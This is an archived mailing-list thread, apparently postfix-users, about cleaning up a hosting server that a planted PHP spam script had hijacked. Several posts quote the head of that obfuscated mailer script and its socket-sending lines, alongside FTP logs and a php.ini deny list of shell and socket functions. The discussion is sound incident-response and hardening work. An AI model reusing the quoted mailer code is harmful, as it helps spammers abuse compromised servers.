Loading ...
Sorry, an error occurred while loading the content.

Temporarily block domain.tld from sending?

Expand Messages
  • Voytek
    It seems one of my users has been hacked, my postfix server is spewing spam from many.names@adomain.tld, how best to prevent any outbound mails from
    Message 1 of 18 , Oct 7, 2013
    • 0 Attachment

      It seems one of my users has been hacked, my postfix server is spewing spam from many.names@..., how best to prevent any outbound mails from adomain.tld till I can look at this?


      --
      Sent from Kaiten Mail. Please excuse my brevity.
    • Simon B
      ... spam from many.names@adomain.tld, how best to prevent any outbound mails from adomain.tld till I can look at this? ... Postfix stop Then post your postconf
      Message 2 of 18 , Oct 7, 2013
      • 0 Attachment


        On 8 Oct 2013 01:54, "Voytek" <lists@...> wrote:
        >
        > It seems one of my users has been hacked, my postfix server is spewing spam from many.names@..., how best to prevent any outbound mails from adomain.tld till I can look at this?
        >

        Postfix stop

        Then post your postconf -n and a log snippet of an outgoing span press.

        Simon

      • lists@...
        ... Simon, thanks ... # postconf -n address_verify_sender = $double_bounce_sender alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases
        Message 3 of 18 , Oct 7, 2013
        • 0 Attachment
          On Tue, October 8, 2013 11:31 am, Simon B wrote:
          > On 8 Oct 2013 01:54, "Voytek" <lists@...> wrote:

          > spam from many.names@..., how best to prevent any outbound mails
          > from adomain.tld till I can look at this?

          > Postfix stop
          >
          >
          > Then post your postconf -n and a log snippet of an outgoing span press.

          Simon, thanks

          --------------------
          # postconf -n
          address_verify_sender = $double_bounce_sender
          alias_database = hash:/etc/aliases
          alias_maps = hash:/etc/aliases
          anvil_rate_time_unit = 1800s
          body_checks = pcre:/etc/postfix/body_checks
          body_checks_size_limit = 150000
          broken_sasl_auth_clients = yes
          command_directory = /usr/sbin
          config_directory = /etc/postfix
          content_filter = smtp-amavis:[127.0.0.1]:10024
          daemon_directory = /usr/libexec/postfix
          debug_peer_level = 2
          disable_vrfy_command = yes
          header_checks = pcre:/etc/postfix/header_checks
          home_mailbox = Maildir/
          html_directory = /usr/share/doc/postfix-2.4.5-documentation/html
          local_recipient_maps = unix:passwd.byname $alias_maps
          local_transport = local
          mail_owner = postfix
          mailq_path = /usr/bin/mailq.postfix
          manpage_directory = /usr/share/man
          message_size_limit = 15360000
          mime_header_checks = pcre:$config_directory/mime_headers.pcre
          mydestination = $myhostname, localhost.$mydomain
          myhostname = server.tld
          mynetworks = 111.222.333.444 222.333.444.555 127.0.0.1
          myorigin = $mydomain
          newaliases_path = /usr/bin/newaliases.postfix
          queue_directory = /var/spool/postfix
          readme_directory = /usr/share/doc/postfix-2.4.5-documentation/readme
          recipient_bcc_maps = hash:/etc/postfix/bcc_r_maps
          recipient_delimiter = +
          sample_directory = /etc/postfix/samples
          sender_bcc_maps = hash:/etc/postfix/bcc_s_maps
          sendmail_path = /usr/sbin/sendmail.postfix
          setgid_group = postdrop
          smtp_tls_cert_file = $smtpd_tls_cert_file
          smtp_tls_key_file = $smtpd_tls_key_file
          smtp_tls_loglevel = 1
          smtp_tls_note_starttls_offer = yes
          smtp_tls_security_level = may
          smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
          smtp_tls_session_cache_timeout = 3600s
          smtpd_client_connection_rate_limit = 50
          smtpd_data_restrictions = reject_unauth_pipelining, permit
          smtpd_helo_required = yes
          smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated,
          check_helo_access ${RE}helo.re
          smtpd_recipient_restrictions = permit_sasl_authenticated,
          permit_mynetworks, reject_unauth_destination, check_recipient_access
          hash:/etc/postfix/recipient_no_checks, reject_non_fqdn_sender,
          reject_non_fqdn_recipient, reject_invalid_helo_hostname,
          reject_non_fqdn_helo_hostname, reject_unknown_sender_domain,
          reject_unknown_reverse_client_hostname, reject_unlisted_recipient,
          check_sender_access hash:/etc/postfix/freemail_access,
          check_recipient_access pcre:/etc/postfix/recipient_checks.pcre,
          check_helo_access hash:/etc/postfix/helo_checks, check_sender_access
          hash:/etc/postfix/sender_checks, check_client_access
          hash:/etc/postfix/client_checks, check_client_access
          pcre:/etc/postfix/client_checks.pcre, reject_rbl_client zen.spamhaus.org,
          reject_rhsbl_client dbl.spamhaus.org, reject_rhsbl_sender
          dbl.spamhaus.org, reject_rbl_client psbl.surriel.com, reject_rbl_client
          bl.spamcop.net, reject_rhsbl_sender dsn.rfc-ignorant.org,
          check_policy_service inet:127.0.0.1:10031, permit
          smtpd_restriction_classes = from_freemail_host
          smtpd_sasl_auth_enable = yes
          smtpd_sasl_authenticated_header = yes
          smtpd_sasl_local_domain =
          smtpd_sasl_path = private/auth
          smtpd_sasl_security_options = noanonymous
          smtpd_sasl_type = dovecot
          smtpd_tls_auth_only = yes
          smtpd_tls_cert_file = /etc/pki/tls/certs/server.crt
          smtpd_tls_key_file = /etc/pki/tls/certs/server.key
          smtpd_tls_loglevel = 1
          smtpd_tls_received_header = yes
          smtpd_tls_security_level = may
          smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
          smtpd_tls_session_cache_timeout = 36000s
          strict_rfc821_envelopes = yes
          tls_random_source = dev:/dev/urandom
          transport_maps = hash:/etc/postfix/transport
          unknown_local_recipient_reject_code = 550
          virtual_alias_maps = proxy:mysql:/etc/postfix/mysql_virtual_alias_maps.cf
          virtual_gid_maps = static:5000
          virtual_mailbox_base = /var/mail/vhosts
          virtual_mailbox_domains =
          proxy:mysql:/etc/postfix/mysql_virtual_domains_maps.cf
          virtual_mailbox_limit = $message_size_limit
          virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
          virtual_minimum_uid = 5000
          virtual_transport = lmtp:unix:private/dovecot-lmtp
          virtual_uid_maps = static:5000

          --------------------

          there is a php script on their web as so, I'm trying to see how it was
          uploaded at this point:

          ---------------------
          head xmlrpcVZY.php
          <?php
          @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL);
          @ini_set('log_errors',0); if (count($_POST) < 2) {
          die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false;
          foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case
          chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 =
          $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case
          chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' ||
          $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
          $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
          $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38];
          $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 =
          n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 =
          n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203));
          $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 =
          urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) !=
          false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 =
          count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; }
          for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 =
          $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1))
          continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b,
          $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
          $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc);
          $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' ||
          $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c;
          } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else {
          $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203);
          $v3a5939e4 = next(explode('@', $v01b6e203)); }
          preg_match('|<USER>(.*)</USER>|
          snip
          ---------------------

          (i wasn't able to include above as I was on 4" mobile screen, sorry)
        • Stan Hoeppner
          ... Without the log entries Simon asked for we can t do anything more to help you, as we don t know how the spam is being injected. Please provide logging
          Message 4 of 18 , Oct 7, 2013
          • 0 Attachment
            On 10/7/2013 9:10 PM, lists@... wrote:
            > On Tue, October 8, 2013 11:31 am, Simon B wrote:
            >> On 8 Oct 2013 01:54, "Voytek" <lists@...> wrote:
            >
            >> spam from many.names@..., how best to prevent any outbound mails
            >> from adomain.tld till I can look at this?
            >
            >> Postfix stop
            >>
            >>
            >> Then post your postconf -n and a log snippet of an outgoing span press.
            >
            > Simon, thanks


            Without the log entries Simon asked for we can't do anything more to
            help you, as we don't know how the spam is being injected. Please
            provide logging that demonstrates the problem.


            > --------------------
            > # postconf -n
            > address_verify_sender = $double_bounce_sender
            > alias_database = hash:/etc/aliases
            > alias_maps = hash:/etc/aliases
            > anvil_rate_time_unit = 1800s
            > body_checks = pcre:/etc/postfix/body_checks
            > body_checks_size_limit = 150000
            > broken_sasl_auth_clients = yes
            > command_directory = /usr/sbin
            > config_directory = /etc/postfix
            > content_filter = smtp-amavis:[127.0.0.1]:10024
            > daemon_directory = /usr/libexec/postfix
            > debug_peer_level = 2
            > disable_vrfy_command = yes
            > header_checks = pcre:/etc/postfix/header_checks
            > home_mailbox = Maildir/
            > html_directory = /usr/share/doc/postfix-2.4.5-documentation/html
            > local_recipient_maps = unix:passwd.byname $alias_maps
            > local_transport = local
            > mail_owner = postfix
            > mailq_path = /usr/bin/mailq.postfix
            > manpage_directory = /usr/share/man
            > message_size_limit = 15360000
            > mime_header_checks = pcre:$config_directory/mime_headers.pcre
            > mydestination = $myhostname, localhost.$mydomain
            > myhostname = server.tld
            > mynetworks = 111.222.333.444 222.333.444.555 127.0.0.1
            > myorigin = $mydomain
            > newaliases_path = /usr/bin/newaliases.postfix
            > queue_directory = /var/spool/postfix
            > readme_directory = /usr/share/doc/postfix-2.4.5-documentation/readme
            > recipient_bcc_maps = hash:/etc/postfix/bcc_r_maps
            > recipient_delimiter = +
            > sample_directory = /etc/postfix/samples
            > sender_bcc_maps = hash:/etc/postfix/bcc_s_maps
            > sendmail_path = /usr/sbin/sendmail.postfix
            > setgid_group = postdrop
            > smtp_tls_cert_file = $smtpd_tls_cert_file
            > smtp_tls_key_file = $smtpd_tls_key_file
            > smtp_tls_loglevel = 1
            > smtp_tls_note_starttls_offer = yes
            > smtp_tls_security_level = may
            > smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
            > smtp_tls_session_cache_timeout = 3600s
            > smtpd_client_connection_rate_limit = 50
            > smtpd_data_restrictions = reject_unauth_pipelining, permit
            > smtpd_helo_required = yes
            > smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated,
            > check_helo_access ${RE}helo.re
            > smtpd_recipient_restrictions = permit_sasl_authenticated,
            > permit_mynetworks, reject_unauth_destination, check_recipient_access
            > hash:/etc/postfix/recipient_no_checks, reject_non_fqdn_sender,
            > reject_non_fqdn_recipient, reject_invalid_helo_hostname,
            > reject_non_fqdn_helo_hostname, reject_unknown_sender_domain,
            > reject_unknown_reverse_client_hostname, reject_unlisted_recipient,
            > check_sender_access hash:/etc/postfix/freemail_access,
            > check_recipient_access pcre:/etc/postfix/recipient_checks.pcre,
            > check_helo_access hash:/etc/postfix/helo_checks, check_sender_access
            > hash:/etc/postfix/sender_checks, check_client_access
            > hash:/etc/postfix/client_checks, check_client_access
            > pcre:/etc/postfix/client_checks.pcre, reject_rbl_client zen.spamhaus.org,
            > reject_rhsbl_client dbl.spamhaus.org, reject_rhsbl_sender
            > dbl.spamhaus.org, reject_rbl_client psbl.surriel.com, reject_rbl_client
            > bl.spamcop.net, reject_rhsbl_sender dsn.rfc-ignorant.org,
            > check_policy_service inet:127.0.0.1:10031, permit
            > smtpd_restriction_classes = from_freemail_host
            > smtpd_sasl_auth_enable = yes
            > smtpd_sasl_authenticated_header = yes
            > smtpd_sasl_local_domain =
            > smtpd_sasl_path = private/auth
            > smtpd_sasl_security_options = noanonymous
            > smtpd_sasl_type = dovecot
            > smtpd_tls_auth_only = yes
            > smtpd_tls_cert_file = /etc/pki/tls/certs/server.crt
            > smtpd_tls_key_file = /etc/pki/tls/certs/server.key
            > smtpd_tls_loglevel = 1
            > smtpd_tls_received_header = yes
            > smtpd_tls_security_level = may
            > smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
            > smtpd_tls_session_cache_timeout = 36000s
            > strict_rfc821_envelopes = yes
            > tls_random_source = dev:/dev/urandom
            > transport_maps = hash:/etc/postfix/transport
            > unknown_local_recipient_reject_code = 550
            > virtual_alias_maps = proxy:mysql:/etc/postfix/mysql_virtual_alias_maps.cf
            > virtual_gid_maps = static:5000
            > virtual_mailbox_base = /var/mail/vhosts
            > virtual_mailbox_domains =
            > proxy:mysql:/etc/postfix/mysql_virtual_domains_maps.cf
            > virtual_mailbox_limit = $message_size_limit
            > virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
            > virtual_minimum_uid = 5000
            > virtual_transport = lmtp:unix:private/dovecot-lmtp
            > virtual_uid_maps = static:5000
            >
            > --------------------
            >
            > there is a php script on their web as so, I'm trying to see how it was
            > uploaded at this point:
            >
            > ---------------------
            > head xmlrpcVZY.php
            > <?php
            > @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL);
            > @ini_set('log_errors',0); if (count($_POST) < 2) {
            > die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false;
            > foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case
            > chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 =
            > $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case
            > chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' ||
            > $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
            > $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
            > $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38];
            > $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 =
            > n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 =
            > n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203));
            > $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 =
            > urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) !=
            > false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 =
            > count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; }
            > for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 =
            > $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1))
            > continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b,
            > $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
            > $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc);
            > $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' ||
            > $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c;
            > } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else {
            > $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203);
            > $v3a5939e4 = next(explode('@', $v01b6e203)); }
            > preg_match('|<USER>(.*)</USER>|
            > snip
            > ---------------------
            >
            > (i wasn't able to include above as I was on 4" mobile screen, sorry)
            >
            >
            >
          • lists@...
            ... Stan, thanks, ... there was a php script uploaded and called Oct 7 23:53:07 postfix/pickup[27638]: DA64B3829CE: uid=48 from= Oct 7
            Message 5 of 18 , Oct 7, 2013
            • 0 Attachment
              On Tue, October 8, 2013 3:02 pm, Stan Hoeppner wrote:
              > On 10/7/2013 9:10 PM, lists@... wrote:

              > Without the log entries Simon asked for we can't do anything more to
              > help you, as we don't know how the spam is being injected. Please provide
              > logging that demonstrates the problem.

              Stan, thanks,

              sorry, I thought that part was sufficient in my message:

              > there is a php script on their web as so, I'm trying to see how it was
              > uploaded at this point:
              >
              > ---------------------
              > head xmlrpcVZY.php

              there was a php script uploaded and called

              Oct 7 23:53:07 postfix/pickup[27638]: DA64B3829CE: uid=48
              from=<lola_clark@...>
              Oct 7 23:53:07 postfix/qmgr[10092]: DA64B3829CE:
              from=<lola_clark@...>, size=891, nrcpt=1 (queue active)

              ...
              Oct 7 23:53:07 geko postfix/pickup[27638]: DA64B3829CE: uid=48
              from=<lola_clark@...>

              216.187.94.181 - - [08/Oct/2013:15:07:17 +1100] "POST /xmlrpcVZY.php
              HTTP/1.1" 404 211 "-" "-"

              ---------------------------------

              I've removed the script, I stopped ftp (it seems it was ftp'd)

              at the time I've posted, I was on a 4" mobile, and, I was looking for a
              stop gap measure to 'stop further damage' from that point
            • Stan Hoeppner
              ... Understood. For a more permanent solution to this script problem, you may want to consider locking down or disabling the pickup service, and configuring
              Message 6 of 18 , Oct 7, 2013
              • 0 Attachment
                On 10/7/2013 11:19 PM, lists@... wrote:
                > On Tue, October 8, 2013 3:02 pm, Stan Hoeppner wrote:
                >> On 10/7/2013 9:10 PM, lists@... wrote:
                >
                >> Without the log entries Simon asked for we can't do anything more to
                >> help you, as we don't know how the spam is being injected. Please provide
                >> logging that demonstrates the problem.
                >
                > Stan, thanks,
                >
                > sorry, I thought that part was sufficient in my message:
                >
                >> there is a php script on their web as so, I'm trying to see how it was
                >> uploaded at this point:
                >>
                >> ---------------------
                >> head xmlrpcVZY.php
                >
                > there was a php script uploaded and called
                >
                > Oct 7 23:53:07 postfix/pickup[27638]: DA64B3829CE: uid=48
                > from=<lola_clark@...>
                > Oct 7 23:53:07 postfix/qmgr[10092]: DA64B3829CE:
                > from=<lola_clark@...>, size=891, nrcpt=1 (queue active)
                >
                > ...
                > Oct 7 23:53:07 geko postfix/pickup[27638]: DA64B3829CE: uid=48
                > from=<lola_clark@...>
                >
                > 216.187.94.181 - - [08/Oct/2013:15:07:17 +1100] "POST /xmlrpcVZY.php
                > HTTP/1.1" 404 211 "-" "-"
                >
                > ---------------------------------
                >
                > I've removed the script, I stopped ftp (it seems it was ftp'd)
                >
                > at the time I've posted, I was on a 4" mobile, and, I was looking for a
                > stop gap measure to 'stop further damage' from that point

                Understood. For a more permanent solution to this script problem, you
                may want to consider locking down or disabling the pickup service, and
                configuring all web applications and MUAs to use the submission service
                with auth. This will prevent such scripts from being able to send mail
                in the event some crafty soul is able to get one uploaded via something
                other than FTP.

                --
                Stan
              • lists@rhsoft.net
                ... disable_functions = mail http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list i never allowed any webserver in the past 10 years to use
                Message 7 of 18 , Oct 8, 2013
                • 0 Attachment
                  Am 08.10.2013 07:44, schrieb Stan Hoeppner:
                  >> I've removed the script, I stopped ftp (it seems it was ftp'd)
                  >>
                  >> at the time I've posted, I was on a 4" mobile, and, I was looking for a
                  >> stop gap measure to 'stop further damage' from that point
                  >
                  > Understood. For a more permanent solution to this script problem, you
                  > may want to consider locking down or disabling the pickup service, and
                  > configuring all web applications and MUAs to use the submission service
                  > with auth. This will prevent such scripts from being able to send mail
                  > in the event some crafty soul is able to get one uploaded via something
                  > other than FTP.

                  disable_functions = mail
                  http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list

                  i never allowed any webserver in the past 10 years to
                  use the sendmail binary for a lot of reasons like header
                  injections and so on
                • Manuel Bieling
                  ... Good, but possibly would not have helped. For me it looks obvious like Stealrat which opens a socket too. I never used PHP in the past 10 years would be
                  Message 8 of 18 , Oct 8, 2013
                  • 0 Attachment
                    On 2013.10.08 09:16:11 +0200, lists@... wrote:
                    > i never allowed any webserver in the past 10 years to
                    > use the sendmail binary for a lot of reasons like header
                    > injections and so on

                    Good, but possibly would not have helped. For me it looks obvious like
                    'Stealrat' which opens a socket too. I never used PHP in the past 10
                    years would be more convincing. However, I agree using a mail relay and
                    mail storage on one maschine with a webserver is too much.

                    if(@mail($recipient, $subject, $message, $reply . $type, "-f$sender"))
                    die(chr(79) . chr(75) . md5(1234567890) . "+0");

                    [...]

                    if(!in_array('fsockopen', $config))
                    $socket = @fsockopen($address, 25, $errno, $errstr, 20);
                    elseif(!in_array('pfsockopen', $config))
                    $socket = @pfsockopen($address, 25, $errno, $errstr, 20);

                    [...]

                    --
                    Best regards,
                    Manuel
                  • lists@rhsoft.net
                    ... postfix does not need to relay without authentication even on 127.0.0.1 ... disable_functions = exec, passthru, shell_exec, system, proc_open, proc_close,
                    Message 9 of 18 , Oct 8, 2013
                    • 0 Attachment
                      Am 08.10.2013 11:32, schrieb Manuel Bieling:
                      > On 2013.10.08 09:16:11 +0200, lists@... wrote:
                      >> i never allowed any webserver in the past 10 years to
                      >> use the sendmail binary for a lot of reasons like header
                      >> injections and so on
                      >
                      > Good, but possibly would not have helped. For me it looks obvious like
                      > 'Stealrat' which opens a socket too.

                      postfix does not need to relay without authentication even on 127.0.0.1

                      > I never used PHP in the past 10
                      > years would be more convincing. However, I agree using a mail relay and
                      > mail storage on one maschine with a webserver is too much.
                      >
                      > if(@mail($recipient, $subject, $message, $reply . $type, "-f$sender"))
                      > die(chr(79) . chr(75) . md5(1234567890) . "+0");
                      >
                      > [...]
                      >
                      > if(!in_array('fsockopen', $config))
                      > $socket = @fsockopen($address, 25, $errno, $errstr, 20);
                      > elseif(!in_array('pfsockopen', $config))
                      > $socket = @pfsockopen($address, 25, $errno, $errstr, 20);
                      >
                      > [...]

                      disable_functions = "exec, passthru, shell_exec, system, proc_open, proc_close, proc_nice, proc_terminate,
                      proc_get_status, pcntl_exec, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,
                      posix_setuid, mail, symlink, link, dl, get_current_user, getmypid, getmyuid, getrusage, fsockopen, pfsockopen,
                      socket_accept, socket_bind, openlog, syslog"
                    • Michael Orlitzky
                      ... Having mail() as the universal interface is nice while you re developing in PHP, since there s no need to fiddle with the settings when moving between
                      Message 10 of 18 , Oct 8, 2013
                      • 0 Attachment
                        On 10/08/2013 01:44 AM, Stan Hoeppner wrote:
                        >
                        > Understood. For a more permanent solution to this script problem, you
                        > may want to consider locking down or disabling the pickup service, and
                        > configuring all web applications and MUAs to use the submission service
                        > with auth. This will prevent such scripts from being able to send mail
                        > in the event some crafty soul is able to get one uploaded via something
                        > other than FTP.
                        >

                        Having mail() as the universal interface is nice while you're developing
                        in PHP, since there's no need to fiddle with the settings when moving
                        between development and production.

                        In case of smart hacker / stupid customer, we set,

                        sendmail_path = /usr/sbin/sendmail -t -i -f postmaster@...

                        in php.ini so that any attempts at abuse generate bounces to an
                        administrator (postmaster@) rather than e.g. the From header of the message.

                        You'll need to override it in certain cases, but it's a safe default. An
                        additional layer of defense is to set,

                        mail.log = syslog

                        in php.ini and then use the existing syslog notification mechanisms to
                        alert an admin of anything unusual. Unfortunately this fails in roughly
                        the same cases that the envelope sender override does: if someone is
                        running a massive phplist mailing list, they need their bounces (to
                        remove bad addresses), and I don't want to hear about every message they
                        send.
                      • lists@rhsoft.net
                        ... well, any software i ever developed from 2003 on is using 127.0.0.1:25 if available without authentication and the configured autentication and SMTP host
                        Message 11 of 18 , Oct 8, 2013
                        • 0 Attachment
                          Am 08.10.2013 15:16, schrieb Michael Orlitzky:
                          > On 10/08/2013 01:44 AM, Stan Hoeppner wrote:
                          >>
                          >> Understood. For a more permanent solution to this script problem, you
                          >> may want to consider locking down or disabling the pickup service, and
                          >> configuring all web applications and MUAs to use the submission service
                          >> with auth. This will prevent such scripts from being able to send mail
                          >> in the event some crafty soul is able to get one uploaded via something
                          >> other than FTP.
                          >>
                          >
                          > Having mail() as the universal interface is nice while you're developing
                          > in PHP, since there's no need to fiddle with the settings when moving
                          > between development and production

                          well, any software i ever developed from 2003 on is using 127.0.0.1:25 if
                          available without authentication and the configured autentication and SMTP
                          host otherwise

                          on no webserver postfix is listening on 127.0.0.1
                          it listens explicitly on a virtual interface and only there

                          the other option is use http://php.net/manual/de/function.php-uname.php
                          and consider a hostname-scheme for development machines

                          these are all things which are solveable
                        • lists@...
                          ... Stan, thanks ... cat xfer* Mon Oct 07 11:14:30 2013 0 ::ffff:37.139.47.33 372 /home/adom.com.au/public_html/rleeDW.html a _ i r adom.com.au ftp 0 * c Mon
                          Message 12 of 18 , Oct 8, 2013
                          • 0 Attachment
                            On Tue, October 8, 2013 4:44 pm, Stan Hoeppner wrote:
                            > On 10/7/2013 11:19 PM, lists@... wrote:

                            >> there was a php script uploaded and called

                            >> I've removed the script, I stopped ftp (it seems it was ftp'd)

                            >> at the time I've posted, I was on a 4" mobile, and, I was looking for a
                            >> stop gap measure to 'stop further damage' from that point
                            >

                            Stan, thanks

                            from proftp logs:

                            ----------
                            cat xfer*

                            Mon Oct 07 11:14:30 2013 0 ::ffff:37.139.47.33 372
                            /home/adom.com.au/public_html/rleeDW.html a _ i r adom.com.au ftp 0 * c
                            Mon Oct 07 11:14:32 2013 0 ::ffff:37.139.47.33 399
                            /home/adom.com.au/public_html/aleeDW.html a _ i r adom.com.au ftp 0 * c
                            Sun Oct 06 05:53:52 2013 0 ::ffff:37.139.47.33 372
                            /home/adom.com.au/public_html/rleeDW.html a _ i r adom.com.au ftp 0 * c
                            Sun Oct 06 05:53:54 2013 0 ::ffff:37.139.47.33 406
                            /home/adom.com.au/public_html/aleeDW.html a _ i r adom.com.au ftp 0 * c
                            Fri Oct 04 04:09:53 2013 0 ::ffff:95.163.104.67 33
                            /home/adom.com.au/public_html/dt.php a _ i r adom.com.au ftp 0 * c
                            Fri Oct 04 04:09:54 2013 0 ::ffff:95.163.104.67 33
                            /home/adom.com.au/public_html/dt.php a _ d r adom.com.au ftp 0 * c
                            Fri Oct 04 04:47:25 2013 0 ::ffff:37.139.47.33 7323
                            /home/adom.com.au/public_html/xmlrpcVZY.php a _ i r adom.com.au ftp 0 * c
                            Fri Sep 20 04:34:21 2013 0 ::ffff:95.163.104.67 33
                            /home/adom.com.au/public_html/dt.php a _ i r adom.com.au ftp 0 * c
                            Fri Sep 20 04:34:23 2013 0 ::ffff:95.163.104.67 33
                            /home/adom.com.au/public_html/dt.php a _ d r adom.com.au ftp 0 * c
                            ----------

                            the ftp users are linked to system users

                            going from above ftp logins:
                            what other logs to search, what to search for?

                            (I'm curious if the user outsourced his web work, AFAIK, the ftp password
                            is a random string assigned from here, will look into this)

                            > Understood. For a more permanent solution to this script problem, you
                            > may want to consider locking down or disabling the pickup service, and
                            > configuring all web applications and MUAs to use the submission service
                            > with auth. This will prevent such scripts from being able to send mail in
                            > the event some crafty soul is able to get one uploaded via something other
                            > than FTP.

                            how do I lock it or disable ?
                            there are several Joomla CMSs, I'll check and see about changing to
                            587/smtp-auth

                            thanks for any other pointers

                            voytek
                          • Stan Hoeppner
                            ... Others responded with some good ideas here, mostly locking down PHP itself so it can t use the sendmail binary. But it sounds like this is a generic web
                            Message 13 of 18 , Oct 8, 2013
                            • 0 Attachment
                              On 10/8/2013 3:08 PM, lists@... wrote:
                              > On Tue, October 8, 2013 4:44 pm, Stan Hoeppner wrote:
                              ...
                              >> Understood. For a more permanent solution to this script problem, you
                              >> may want to consider locking down or disabling the pickup service, and
                              >> configuring all web applications and MUAs to use the submission service
                              >> with auth. This will prevent such scripts from being able to send mail in
                              >> the event some crafty soul is able to get one uploaded via something other
                              >> than FTP.
                              >
                              > how do I lock it or disable ?
                              > there are several Joomla CMSs, I'll check and see about changing to
                              > 587/smtp-auth

                              Others responded with some good ideas here, mostly locking down PHP
                              itself so it can't use the sendmail binary. But it sounds like this is
                              a generic web hosting server for your customers. Which means they may
                              be using all manner of languages other than PHP, such as Perl, Java, etc.

                              In this case, the most thorough way to lock this down, other than
                              disabling the pickup service in master.cf, is to restrict execute
                              permissions on the sendmail binary to root. This prevents all web
                              applications from using the pickup service. Then instruct all of your
                              users to use the submission service on TCP 587 for sending mail.

                              Disabling pickup is the easiest and quickest way to stop this spamming
                              permanently. But it will likely break management functions that need to
                              send mail via pickup, such as logwatch, pflogsumm, etc. Thus
                              restricting which users can execute the sendmail binary is a better
                              solution.

                              --
                              Stan
                            • lists@...
                              ... Stan, Michael and other who responded, thanks ... modified php.ini as per Micheal s suggestion; yes, it is as you suggest, all manner.. ; ... I ll work
                              Message 14 of 18 , Oct 8, 2013
                              • 0 Attachment
                                On Wed, October 9, 2013 10:41 am, Stan Hoeppner wrote:
                                > On 10/8/2013 3:08 PM, lists@... wrote:

                                Stan, Michael and other who responded, thanks

                                > Others responded with some good ideas here, mostly locking down PHP
                                > itself so it can't use the sendmail binary. But it sounds like this is a
                                > generic web hosting server for your customers. Which means they may be
                                > using all manner of languages other than PHP, such as Perl, Java, etc.

                                modified php.ini as per Micheal's suggestion;
                                yes, it is as you suggest, 'all manner..';

                                > In this case, the most thorough way to lock this down, other than
                                > disabling the pickup service in master.cf, is to restrict execute
                                > permissions on the sendmail binary to root. This prevents all web
                                > applications from using the pickup service. Then instruct all of your
                                > users to use the submission service on TCP 587 for sending mail.
                                > Disabling pickup is the easiest and quickest way to stop this spamming
                                > permanently. But it will likely break management functions that need to
